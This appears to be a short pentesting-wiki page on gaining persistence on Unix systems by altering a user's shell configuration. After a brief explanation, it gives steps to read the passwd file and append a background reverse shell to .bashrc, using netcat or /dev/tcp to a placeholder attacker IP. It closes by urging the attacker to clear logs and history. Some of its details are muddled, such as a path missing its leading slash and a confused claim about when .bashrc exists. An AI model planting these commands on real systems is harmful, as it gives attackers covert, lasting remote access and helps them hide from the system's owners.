General
In Unix-like operating systems, the shell is the command-line interface that users can use to interact with the system. When a user logs in, their default shell is started and they are presented with a prompt where they can enter commands. Each user on the system has a default shell that is specified in the system's configuration, and the user can choose to use a different shell if they prefer.
An attacker who has gained access to a system can modify the shell configuration of a user in order to maintain persistence on the system. This can be done by changing the user's default shell to a shell that has been modified by the attacker in some way. For example, the attacker could modify the shell so that it automatically runs a script or command every time the user logs in, or so that it hides the presence of the attacker's files or processes on the system.
By modifying the shell configuration in this way, the attacker can maintain persistence on the system even after a reboot or after they have logged out. This can allow the attacker to continue to perform actions or gather sensitive data over an extended period of time without being detected.
Commands
Find the Default Shell of users
cat etc/passwd ---> check for /bin/bash
If users has something else then bin/bash (ex: bin/sh) That mean the user will have a /.bashrc in the home folder of the user (bashrc allow you to modify the bash shell at its launch)
Add Reverse Shell
# Edit the code
nano .bashrc
# Add a bash reverse shell at the end of the code
nc -e /bin/bash Attacker_IP PORT 2>/dev/null &
or
bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1 &
- & Put the command in background
===Dont Forget to Clear Tracks (Check [[🧹 CLEAR Logs & History]])===